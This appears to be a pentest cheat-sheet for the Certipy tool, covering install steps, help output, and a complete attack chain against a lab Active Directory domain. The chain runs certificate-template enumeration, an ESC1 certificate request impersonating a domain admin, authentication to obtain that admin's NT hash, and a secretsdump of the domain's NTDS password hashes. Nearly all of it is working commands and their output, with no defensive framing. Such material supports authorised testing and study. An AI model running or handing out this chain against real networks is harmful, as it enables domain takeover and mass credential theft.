Active Directory Certificate Services enumeration and abuse.
git clone https://github.com/ly4k/Certipy
sudo python3 setup.py install
certipy [-v] [-h] {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template} ...
Certipy v4.8.2 - by Oliver Lyak (ly4k)
positional arguments:
{account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template}
Action
account Manage user and machine accounts
auth Authenticate using certificates
ca Manage CA and certificates
cert Manage certificates and private keys
find Enumerate AD CS
forge Create Golden Certificates
ptt Inject TGT for SSPI authentication
relay NTLM Relay to AD CS HTTP Endpoints
req Request certificates
shadow Abuse Shadow Credentials for account takeover
template Manage certificate templates
options:
-v, --version Show Certipy's version number and exit
-h, --help Show this help message and exit
For more examples please check the Github Repo.
$ certipy find -u [email protected] -p Welkom1234 -dc-ip 10.10.10.10
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 9 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 8 enabled certificate templates
[*] Trying to get CA configuration for 'CA01-OFFSEC' via CSRA
[*] Got CA configuration for 'CA01-OFFSEC'
[*] Saved BloodHound data to '202210114803_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '202210114803_Certipy.txt'
[*] Saved JSON output to '202210114803_Certipy.json'
$ certipy req -u 'crypt0rr.offsec.nl' -p 'Welkom1234' -target 'dc01.offsec.nl' -ca 'CA01-OFFSEC' -template 'ESC1' -upn '[email protected]'
Certipy v4.0.0 - by Oliver Lyak (Ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 707
[*] Got certificate with UP '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'john-da.pfx'
$ certipy auth -pfx 'john-da.pfx' -dc-ip '10.10.10.11' -username 'john-da' -domain 'offsec.nl'
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT.
[*] Got TGT
[*] Saved credential cache to john-da.ccache'
[*] Trying to retrieve NT hash for 'john-da'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305
$ secretsdump.py -just-dc -hashes 'aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305' 'offsec.nl/[email protected]'
Impacketv0.10.1.dev1+20220504.120002.d5097759 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\id:rid: lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f859684db2422704e9e4c2cd7e27b07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]